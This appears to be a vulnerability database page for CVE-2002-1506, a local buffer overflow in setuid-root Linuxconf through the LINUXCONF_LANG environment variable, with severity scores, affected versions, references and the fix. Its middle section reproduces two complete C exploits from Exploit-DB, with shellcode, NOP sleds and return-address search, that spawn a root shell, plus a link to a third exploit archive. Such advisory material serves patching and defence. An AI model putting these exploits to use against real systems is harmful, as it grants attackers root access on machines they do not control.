CVE-2002-1506
CVSS 7.2
Published: 2003-04-02 00:00:00
Revised: 2008-09-05 16:30:46

[Original] Buffer overflow in Linuxconf before 1.28r4 allows local users to execute arbitrary code via a long LINUXCONF_LANG environment variable, which overflows an error string that is generated.


[CNNVD] Linuxconf local environment variable buffer overflow vulnerability. (CNNVD-200304-014)

Linuxconf versions before 1.28r4 contain a buffer overflow vulnerability. A local user can execute arbitrary code by means of an overly long environment variable; the overflow occurs in an error string that the program generates.

- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:jacques_gelinas:linuxconf:1.2.1
cpe:/a:jacques_gelinas:linuxconf:1.2.4r4
cpe:/a:jacques_gelinas:linuxconf:1.1.8
cpe:/a:jacques_gelinas:linuxconf:1.2.3r1
cpe:/a:jacques_gelinas:linuxconf:1.1.9r1
cpe:/a:jacques_gelinas:linuxconf:1.2.1r6
cpe:/a:jacques_gelinas:linuxconf:1.2.3
cpe:/a:jacques_gelinas:linuxconf:1.2.1r2
cpe:/a:jacques_gelinas:linuxconf:1.1.6r10
cpe:/a:jacques_gelinas:linuxconf:1.1.9r2
cpe:/a:jacques_gelinas:linuxconf:1.2r2
cpe:/a:jacques_gelinas:linuxconf:1.2.1r1
cpe:/a:jacques_gelinas:linuxconf:1.28r1
cpe:/a:jacques_gelinas:linuxconf:1.2
cpe:/a:jacques_gelinas:linuxconf:1.2.1r8
cpe:/a:jacques_gelinas:linuxconf:1.27r5
cpe:/a:jacques_gelinas:linuxconf:1.2.3r2
cpe:/a:jacques_gelinas:linuxconf:1.27r4
cpe:/a:jacques_gelinas:linuxconf:1.2.1r7
cpe:/a:jacques_gelinas:linuxconf:1.2.2
cpe:/a:jacques_gelinas:linuxconf:1.2.4r5
cpe:/a:jacques_gelinas:linuxconf:1.2r1
cpe:/a:jacques_gelinas:linuxconf:1.27
cpe:/a:jacques_gelinas:linuxconf:1.2.4
cpe:/a:jacques_gelinas:linuxconf:1.2.1r5
cpe:/a:jacques_gelinas:linuxconf:1.28r2
cpe:/a:jacques_gelinas:linuxconf:1.28
cpe:/a:jacques_gelinas:linuxconf:1.2.1r3
cpe:/a:jacques_gelinas:linuxconf:1.2.4r2
cpe:/a:jacques_gelinas:linuxconf:1.28r3
cpe:/a:jacques_gelinas:linuxconf:1.1.7
cpe:/a:jacques_gelinas:linuxconf:1.2.1r4
cpe:/a:jacques_gelinas:linuxconf:1.27r3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1506
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1506
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-014
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5585
(VENDOR_ADVISORY)  BID  5585
http://www.iss.net/security_center/static/9980.php
(VENDOR_ADVISORY)  XF  linuxconf-linuxconflang-env-bo(9980)
http://archives.neohapsis.com/archives/bugtraq/2002-08/0304.html
(VENDOR_ADVISORY)  BUGTRAQ  20020828 iDEFENSE Security Advisory: Linuxconf locally exploitable buffer overflow
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0093.html
(UNKNOWN)  VULNWATCH  20020828 iDEFENSE Security Advisory: Linuxconf locally exploitable buffer overflow
http://www.solucorp.qc.ca/changes.hc?projet=linuxconf&version=1.28r4
(UNKNOWN)  MISC  http://www.solucorp.qc.ca/changes.hc?projet=linuxconf&version=1.28r4

- Vulnerability information

Linuxconf local environment variable buffer overflow vulnerability.
High risk  Buffer overflow
2003-04-02 00:00:00 2005-10-20 00:00:00
Local
Linuxconf versions before 1.28r4 contain a buffer overflow vulnerability. A local user can execute arbitrary code by means of an overly long environment variable; the overflow occurs in an error string that the program generates.

- Advisories and patches

The vendor has released a fix which addresses this issue:
Jacques Gelinas Linuxconf 1.1.6 r10
Jacques Gelinas Linuxconf 1.1.7
Jacques Gelinas Linuxconf 1.1.8
Jacques Gelinas Linuxconf 1.1.9 r2
Jacques Gelinas Linuxconf 1.1.9 r1
Jacques Gelinas Linuxconf 1.2 r1
Jacques Gelinas Linuxconf 1.2 r2
Jacques Gelinas Linuxconf 1.2
Jacques Gelinas Linuxconf 1.2.1 r3
Jacques Gelinas Linuxconf 1.2.1 r1
Jacques Gelinas Linuxconf 1.2.1 r2
Jacques Gelinas Linuxconf 1.2.1 r5
Jacques Gelinas Linuxconf 1.2.1 r7
Jacques Gelinas Linuxconf 1.2.1 r8
Jacques Gelinas Linuxconf 1.2.1 r6
Jacques Gelinas Linuxconf 1.2.1
Jacques Gelinas Linuxconf 1.2.1 r4
Jacques Gelinas Linuxconf 1.2.2
Jacques Gelinas Linuxconf 1.2.3 r1
Jacques Gelinas Linuxconf 1.2.3
Jacques Gelinas Linuxconf 1.2.3 r2
Jacques Gelinas Linuxconf 1.2.4 r2
Jacques Gelinas Linuxconf 1.2.4
Jacques Gelinas Linuxconf 1.2.4 r5
Jacques Gelinas Linuxconf 1.2.4 r4
Jacques Gelinas Linuxconf 1.27 r3
Jacques Gelinas Linuxconf 1.27
Jacques Gelinas Linuxconf 1.27 r5
Jacques Gelinas Linuxconf 1.27 r4
Jacques Gelinas Linuxconf 1.28 r3
Jacques Gelinas Linuxconf 1.28 r2
Jacques Gelinas Linuxconf 1.28
Jacques Gelinas Linuxconf 1.28 r1

- Vulnerability information (21761)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (1) (EDBID:21761)
linux local
2002-08-28 Verified
0 RaiSe
N/A
source: http://www.securityfocus.com/bid/5585/info

Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.

A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficient bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable to an overly large string will be able to cause the buffer overflow condition.

/* 
 * Linuxconf <= 1.28r3 local xploit
 * by RaiSe <raise@netsearch-ezine.com>
 * http://www.netsearch-ezine.com
 *
 * Tested on:
 *             Mandrake 8.0
 *             Mandrake 8.2
 *             RedHat   7.3
 *
 * (run without args on directory
 *  with +w)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <asm/user.h>
#include <string.h>
#include <strings.h>	/* bzero() */
#include <fcntl.h>
#include <unistd.h>

#define PATHLCONF	"/sbin/linuxconf"


unsigned long get_shell(void);

char shellcode[]=  // by RaiSe
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc9\x51\xb8\x38"
"\x65\x73\x68\x66\x35\x56\x4a\x50\xb8\x65\x65\x62\x69\x66\x35"
"\x4a\x4a\x50\x89\xe3\x51\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b"
"\xcd\x80";


int main(void)
{
FILE *fp;
char buf[2056], buf2[2048];
unsigned long shell, *p;
int i;


printf("\n[ Linuxconf Local Xploit by RaiSe ]\n\n");
fflush(stdout);

sprintf(buf2, "%s.eng", shellcode);

if (mkdir(buf2, S_IRWXU))
	{
	fprintf(stderr, "* Error at creat directory (.eng), +w? is it exist?, "
	                "delete it and run again.\n\n");
	exit(-1);
	}
else	
	sprintf(buf2, "%s.eng/%s.eng", shellcode, shellcode);

if ((fp = fopen(buf2, "w")) == NULL)
	{
	fprintf(stderr, "* Error at creat file,  +w?\n\n");
	exit(-1);
	}
else
	fclose(fp);

printf("* Directory + file created ..\n");
printf("   [dont forget to delete it ;)]\n");
fflush(stdout);

bzero(buf, sizeof(buf));
shell = get_shell();

p = (unsigned long *) buf;

for (i = 0; i < 2048 ; i+=4)
	*p++ = shell;


setenv("SCODE", shellcode, 1);
setenv("LINUXCONF_LANG",buf,1);
execl(PATHLCONF, "linuxconf", NULL);

exit(-1);

} /******* end of main() ******/


unsigned long get_shell(void)
{
unsigned long sc;
struct user_regs_struct regs;
int pid_vuln, n;


/* create a child process */
if (!(pid_vuln = fork()))
	{
	char buf[2056];

	sleep(2);
	bzero(buf, sizeof(buf));
	memset(buf, 0x41, 2048);

	setenv("SCODE", shellcode, 1);
	setenv("LINUXCONF_LANG",buf, 1);
	execl(PATHLCONF, "linuxconf", NULL);

	fprintf(stderr, "Error: execl.\n");
	exit(-1);
	}
else
	{

	if (ptrace(PTRACE_ATTACH, pid_vuln))
		{
		fprintf(stderr, "Error: PTRACE_ATTACH.\n");
		exit(-1);
		}

	waitpid(pid_vuln, NULL, 0);

	printf("\n[* Looking at %%esp .. ]\n");
	fflush(stdout);

	if (ptrace(PTRACE_CONT, pid_vuln, 0, 0))
		{
		fprintf(stderr, "Error: PTRACE_CONT.\n");
		exit(-1);
		}

	waitpid(pid_vuln, NULL, 0);

	if (ptrace(PTRACE_GETREGS, pid_vuln, 0, &regs))
		{
		fprintf(stderr, "Error: PTRACE_GETREGS.\n");
		exit(-1);
		}

	printf("[* Looking at: 0x%08x ]\n", (int) regs.esp);
	fflush(stdout);

	n = 0, sc = 0;

	do
		{
		if ((sc = ptrace(PTRACE_PEEKTEXT, pid_vuln,
				 (int)(regs.esp+(n++)), 0)) == -1)
			{
			fprintf(stderr, "Error: PTRACE_PEEKTEXT.\n");
			exit(-1);
			}

		} while (sc != 0x90909090);

	n--;
	printf("[* Shellcode found at: 0x%08x ]\n", (int)(regs.esp + n));
	fflush(stdout);

	if(ptrace(PTRACE_KILL, pid_vuln, 0, 0))
		{
		fprintf(stderr, "Error: PTRACE_KILL.\n");
		exit(-1);
		}
	else
		{
		waitpid(pid_vuln, NULL, 0);
		printf("[* Xploting .. ]\n\n");
		fflush(stdout);
		sleep(1);
		return((unsigned long)(regs.esp + n));
		}
	}

} /********* end of get_shell() **********/


/* EOF */
		

- Vulnerability information (21762)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (2) (EDBID:21762)
linux local
2002-08-28 Verified
0 David Endler
N/A
source: http://www.securityfocus.com/bid/5585/info
 
Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.
 
A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficient bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable to an overly large string will be able to cause the buffer overflow condition.

/*
 * This is an exploit for the linuxconf overflow issue.
 *
 * The detail of this hole was published on 08.28.2002 by
 * David Endler from www.idefense.com. 
 *
 * Tested to work on Redhat 7.0 with linuxconf 1.25r3.
 * [The magic numbers that worked for me are: 980 500 2048 1]
 *
 * This is a classical example of stack smashing. Large portion 
 * of code were ripped from Aleph1's. So, credits due to him.
 *
 * Flame or comment goes to: jinyean@hotmail.com 
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_ALIGN		0
#define DEFAULT_OFFSET		0
#define DEFAULT_BUFFER_SIZE	980
#define DEFAULT_EGG_SIZE	2048
#define NOP			0x90

char shellcode[]=
        "\xeb\x1f\x5e\x89\x76\x09\x31\xc0\x88\x46\x08\x89"
        "\x46\x0d\xb0\x0b\x89\xf3\x8d\x4e\x09\x8d\x56\x0d"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/ash";


/* returns the current stack pointer: on i386 the value left in %eax is the return value */
unsigned long get_esp(void) {
	__asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
	char *buff, *ptr, *egg;
	long *addr_ptr, addr;
	int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
	int i, eggsize=DEFAULT_EGG_SIZE, align=DEFAULT_ALIGN;

	if (argc>1) bsize=atoi(argv[1]);
	if (argc>2) offset=atoi(argv[2]);
	if (argc>3) eggsize=atoi(argv[3]);
	if (argc>4) align=atoi(argv[4]);

	if (!(buff=malloc(bsize))) {
		printf("Can't allocate memory.\n");
		exit(0);
	}
	if (!(egg=malloc(eggsize))) {
		printf("Can't allocate memory.\n");
		exit(0);
	}

	addr=get_esp()-offset;
	printf("Using address: 0x%x\n",addr);

	ptr=buff;
	addr_ptr=(long *)(ptr+align);

	for (i=0; i<bsize; i+=4) 
		*(addr_ptr++)=addr;

	ptr=egg;

	for (i=0; i<eggsize-strlen(shellcode)-1; i++)
		*(ptr++)=NOP;

	for (i=0; i<strlen(shellcode); i++)
		*(ptr++)=shellcode[i];

	buff[bsize-1]='\0';
	egg[eggsize-1]='\0';

	memcpy(egg,"EGG=",4);
	putenv(egg);
	memcpy(buff,"LINUXCONF_LANG=",15);
	putenv(buff);
	execl("/sbin/linuxconf","linuxconf",NULL);

}
		

- Vulnerability information (21763)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (3) (EDBID:21763)
linux local
2002-08-28 Verified
0 syscalls
N/A
source: http://www.securityfocus.com/bid/5585/info
  
Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.
  
A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficient bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable to an overly large string will be able to cause the buffer overflow condition.

http://www.exploit-db.com/sploits/21763.tar.gz		

- Vulnerability information

6067
Linuxconf LINUXCONF_LANG Variable Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability description

linuxconf contains a flaw that may allow a malicious user to gain root privileges. The issue is triggered when passing 964 or more bytes of data to the LINUXCONF_LANG environment variable, overflowing a buffer. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality and integrity.

- Timeline

2002-08-28 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.28r4 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: remove the setuid bit from the linuxconf binary.

- Vulnerability information

Linuxconf Local Environment Variable Buffer Overflow Vulnerability
Boundary Condition Error 5585
No Yes
2002-08-28 12:00:00 2009-07-11 03:56:00
Discovery of this vulnerability credited to Euan Briggs (euan_briggs@btinternet.com).

- Affected program versions

Jacques Gelinas Linuxconf 1.28 r3
+ RedHat Linux 7.3
Jacques Gelinas Linuxconf 1.28 r2
Jacques Gelinas Linuxconf 1.28 r1
Jacques Gelinas Linuxconf 1.28
Jacques Gelinas Linuxconf 1.27 r5
Jacques Gelinas Linuxconf 1.27 r4
Jacques Gelinas Linuxconf 1.27 r3
Jacques Gelinas Linuxconf 1.27
Jacques Gelinas Linuxconf 1.2.4 r5
Jacques Gelinas Linuxconf 1.2.4 r4
Jacques Gelinas Linuxconf 1.2.4 r2
Jacques Gelinas Linuxconf 1.2.4
Jacques Gelinas Linuxconf 1.2.3 r2
Jacques Gelinas Linuxconf 1.2.3 r1
Jacques Gelinas Linuxconf 1.2.3
Jacques Gelinas Linuxconf 1.2.2
Jacques Gelinas Linuxconf 1.2.1 r8
Jacques Gelinas Linuxconf 1.2.1 r7
Jacques Gelinas Linuxconf 1.2.1 r6
Jacques Gelinas Linuxconf 1.2.1 r5
Jacques Gelinas Linuxconf 1.2.1 r4
Jacques Gelinas Linuxconf 1.2.1 r3
Jacques Gelinas Linuxconf 1.2.1 r2
Jacques Gelinas Linuxconf 1.2.1 r1
Jacques Gelinas Linuxconf 1.2.1
Jacques Gelinas Linuxconf 1.2 r2
Jacques Gelinas Linuxconf 1.2 r1
Jacques Gelinas Linuxconf 1.2
Jacques Gelinas Linuxconf 1.1.9 r2
Jacques Gelinas Linuxconf 1.1.9 r1
Jacques Gelinas Linuxconf 1.1.8
Jacques Gelinas Linuxconf 1.1.7
Jacques Gelinas Linuxconf 1.1.6 r10
Jacques Gelinas Linuxconf 1.28 r4

- Unaffected program versions

Jacques Gelinas Linuxconf 1.28 r4

- Vulnerability discussion

Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.

A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficient bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable to an overly large string will be able to cause the buffer overflow condition.

- Exploit

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

The vendor has released a fix which addresses this issue:
Jacques Gelinas Linuxconf 1.1.6 r10
Jacques Gelinas Linuxconf 1.1.7
Jacques Gelinas Linuxconf 1.1.8
Jacques Gelinas Linuxconf 1.1.9 r2
Jacques Gelinas Linuxconf 1.1.9 r1
Jacques Gelinas Linuxconf 1.2 r1
Jacques Gelinas Linuxconf 1.2 r2
Jacques Gelinas Linuxconf 1.2
Jacques Gelinas Linuxconf 1.2.1 r3
Jacques Gelinas Linuxconf 1.2.1 r1
Jacques Gelinas Linuxconf 1.2.1 r2
Jacques Gelinas Linuxconf 1.2.1 r5
Jacques Gelinas Linuxconf 1.2.1 r7
Jacques Gelinas Linuxconf 1.2.1 r8
Jacques Gelinas Linuxconf 1.2.1 r6
Jacques Gelinas Linuxconf 1.2.1
Jacques Gelinas Linuxconf 1.2.1 r4
Jacques Gelinas Linuxconf 1.2.2
Jacques Gelinas Linuxconf 1.2.3 r1
Jacques Gelinas Linuxconf 1.2.3
Jacques Gelinas Linuxconf 1.2.3 r2
Jacques Gelinas Linuxconf 1.2.4 r2
Jacques Gelinas Linuxconf 1.2.4
Jacques Gelinas Linuxconf 1.2.4 r5
Jacques Gelinas Linuxconf 1.2.4 r4
Jacques Gelinas Linuxconf 1.27 r3
Jacques Gelinas Linuxconf 1.27
Jacques Gelinas Linuxconf 1.27 r5
Jacques Gelinas Linuxconf 1.27 r4
Jacques Gelinas Linuxconf 1.28 r3
Jacques Gelinas Linuxconf 1.28 r2
Jacques Gelinas Linuxconf 1.28
Jacques Gelinas Linuxconf 1.28 r1
